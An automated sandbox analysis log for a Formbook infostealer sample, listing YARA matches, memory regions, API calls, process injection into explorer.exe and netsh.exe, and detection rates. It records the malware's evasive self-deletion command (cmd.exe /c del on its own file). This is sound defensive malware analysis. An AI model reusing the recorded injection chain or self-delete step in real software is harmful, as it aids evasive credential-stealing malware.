Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: triage_dropped_file.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 0_2_0186C1D4
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 0_2_0186E608
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 0_2_0186E618
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_0041E876
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_00401030
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_0041E47F
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_0041DDBE
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_00409E5B
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_00409E60
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_0041E622
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_00402FB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03302B28
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0325AB40
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0326EBB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032F03DA
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032FDBD2
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032EFA2B
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_033022AE
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03254120
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0323F900
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032599BF
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0330E824
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0325A830
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032F1002
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032620A0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_033020A8
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0324B090
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_033028EC
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03301FF1
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0330DFCE
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03256E30
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032FD616
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03302EF7
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03230D20
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03302D07
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03301D55
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03262581
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0324D5E0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_033025DD
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0324841F
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032FD466
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0099E876
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0099E47F
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_00982D90
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0099DDB9
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0099E622
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_00989E5B
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_00989E60
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_00982FB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 0323B150 appears 72 times
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_0041A370 NtCreateFile,
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_0041A420 NtReadFile,
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_0041A4A0 NtClose,
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_0041A550 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 5_2_0041A41A NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0327A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0327B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0327A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0327A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0327AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_03279560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_032795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0099A370 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0099A4A0 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0099A420 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 21_2_0099A41A NtReadFile,
          Source: triage_dropped_file.exe, 00000000.00000002.283726954.0000000000F06000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameUCOMITypeL.exe2 vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000000.00000002.288703731.00000000076B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000000.00000002.284884958.00000000031F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000005.00000002.363758090.000000000179F000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000005.00000000.281572749.0000000000A06000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameUCOMITypeL.exe2 vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000005.00000002.364364787.000000000347C000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamenetsh.exej% vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000005.00000002.363443966.000000000160F000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs triage_dropped_file.exe
          Source: triage_dropped_file.exe | Binary or memory string: OriginalFilenameUCOMITypeL.exe2 vs triage_dropped_file.exe
          Source: triage_dropped_file.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: triage_dropped_file.exe | Virustotal: Detection: 52%
          Source: triage_dropped_file.exe | Metadefender: Detection: 21%
          Source: triage_dropped_file.exe | ReversingLabs: Detection: 70%
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | File read: C:\Users\user\Desktop\triage_dropped_file.exe:Zone.Identifier
          Source: triage_dropped_file.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\triage_dropped_file.exe "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Process created: C:\Users\user\Desktop\triage_dropped_file.exe C:\Users\user\Desktop\triage_dropped_file.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Process created: C:\Users\user\Desktop\triage_dropped_file.exe C:\Users\user\Desktop\triage_dropped_file.exe
          Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\triage_dropped_file.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/1@3/2
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_01
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\triage_dropped_file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: triage_dropped_file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: triage_dropped_file.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: triage_dropped_file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\mNyEIdHepa\src\obj\Debug\UCOMITypeL.pdb source: triage_dropped_file.exe
          Source: Binary string: netsh.pdb source: triage_dropped_file.exe, 00000005.00000002.364321923.0000000003460000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: triage_dropped_file.exe, 00000005.00000002.363232393.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000005.00000002.363443966.000000000160F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507374686.0000000003210000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507739154.000000000332F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: triage_dropped_file.exe, 00000005.00000002.364321923.0000000003460000.00000040.10000000.00040000.00000000.sdmp
